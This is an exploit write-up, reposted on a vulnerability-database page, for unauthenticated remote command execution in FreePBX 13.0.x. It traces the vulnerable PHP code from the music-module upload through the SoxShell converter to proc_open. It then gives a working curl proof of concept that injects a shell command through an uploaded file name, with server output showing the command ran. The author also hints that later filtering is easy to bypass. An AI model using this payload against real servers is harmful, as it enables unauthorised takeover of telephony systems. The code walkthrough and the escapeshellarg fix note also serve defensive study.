Vulners
Lucene search
FreePBX 13.0.x < 13.0.154 - Remote Command Execution
Vulnerable software : Freepbx
Tested versions : 13.0.x < 13.0.154
vendor : freepbx.org
Author : i-Hmx
Email : [email protected]
Home : sec4ever.com
Knock knock people , Eg-R1z on the mic again . .
Freepbx is vulnerable to unauthenticated remote command execution due to multiple weak inputs validation as well as partial authenticaion bypass
Need more technical shit?!
Here u go
File : /var/www/html/admin/libraries/Composer/vendor/symfony/process/Symfony/Component/Process/Process.php
class Process
{
const ERR = 'err';
const OUT = 'out';
const STATUS_READY = 'ready';
const STATUS_STARTED = 'started';
const STATUS_TERMINATED = 'terminated';
Line 145:
public function __construct($commandline, $cwd = null, array $env = null, $input = null, $timeout = 60, array $options = array())
{
if (!function_exists('proc_open')) {
throw new RuntimeException('The Process class relies on proc_open, which is not available on your PHP installation.');
}
--===>>> $this->commandline = $commandline;
$this->cwd = $cwd;
Line 275
$commandline = $this->commandline;
if ('\\' === DIRECTORY_SEPARATOR && $this->enhanceWindowsCompatibility) {
$commandline = 'cmd /V:ON /E:ON /C "('.$commandline.')';
foreach ($this->processPipes->getFiles() as $offset => $filename) {
$commandline .= ' '.$offset.'>'.ProcessUtils::escapeArgument($filename);
}
$commandline .= '"';
if (!isset($this->options['bypass_shell'])) {
$this->options['bypass_shell'] = true;
}
}
--===>>> $this->process = proc_open($commandline, $descriptors, $this->processPipes->pipes, $this->cwd, $this->env, $this->options);
Class is being called at
File : /var/www/html/admin/libraries/media/Media/Driver/Drivers/SoxShell.php
Line 118
public function convert($newFilename,$extension,$mime) {
switch($extension) {
case "wav":
switch($this->extension) {
case "sln":
$process = new Process($this->binary.' -t raw -s -b 16 -r 8000 '.$this->track.' -r '.$this->options['samplerate'].' -b '.$this->options['bitdepth'].' -c 1 '.$newFilename);
break;
case "sln12":
$process = new Proces.................
case "wav16":
---===>> $process = new Process($this->binary.' '.$this->track.' -t wav -b 16 -r 16000 -c 1 '.$newFilename);
break;
default:
$process = new Process($this->binary.' '.$this->track.' -c 1 '.$newFilename);
break;
}
if(!$this->background) {
---===>> $process->run();
if (!$process->isSuccessful()) {
throw new \RuntimeException($process->getErrorOutput());
}
} else {
$process->start();
if (!$process->isRunning()) {
throw new \RuntimeException($process->getErrorOutput());
}
}
}
Sox shell can be called via multiple parts of the fpbx including the music module
File : admin/modules/music/Music.class.php
Line : 407
$name = $dname . '.' . $extension;
move_uploaded_file($tmp_name, $this->tmp."/".$name);
$media->load($this->tmp."/".$name);
foreach($_POST['codec'] as $c) {
--==>> $media->convert($path."/".$dname.".".$c);
}
unlink($this->tmp."/".$name);
this part can be accessed by unauthenticated user and so it's obvious command execution vulnerable :/
POC :
[root:/lab/fpbx]# curl -i -s -k -X 'POST' \
-H 'User-Agent: sec4ever 1337s' -H 'Referer: http://x.x.x.x/admin/ajax.php' -H 'Content-Type: multipart/form-data; boundary=---------------------------317092200613369' \
--data-binary $'-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"extension\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"language\"\x0d\x0a\x0d\x0aen\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"filename\"\x0d\x0a\x0d\x0afa.wav\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"codec[1]\"\x0d\x0a\x0d\x0agsm\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"id\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"files[1]\"; filename=\"$(id).wav\"\x0d\x0aContent-Type: text/plain\x0d\x0a\x0d\x0aEg-R1z ruling you ;)\x0d\x0a-----------------------------317092200613369\x0d\x0a\x0d\x0a' \
'http://x.x.x.x/admin/ajax.php?module=music&command=upload'
HTTP/1.1 500 Internal Server Error
Date: Wed, 07 Sep 2016 17:33:02 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.28
Set-Cookie: lang=en_US
Set-Cookie: PHPSESSID=6j9ei3pn1btu2o6jc1j6mngmp4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Ignore-This: 1
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json
{"error":{"type":"RuntimeException","message":"\/usr\/bin\/sox formats: can't open input file `groups=498(asterisk).wav': No such file or directory\n","file":"\/var\/www\/html\/admin\/libraries\/media\/Media\/Driver\/Drivers\/SoxShell.php","line":194}}#
Patching : can be done via adding escapeshellarg to soxshell inputs
Almost fixed in fpbx later versions
# in this version spaces,',`,/,\,<,>,?,&,| are filtered , which can be super easily bypassed
# make a priv8 , burn another ;)
# From Eg-R1z with Love xDData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Sep 2016 00:00Current
7.4High risk
Vulners AI Score7.4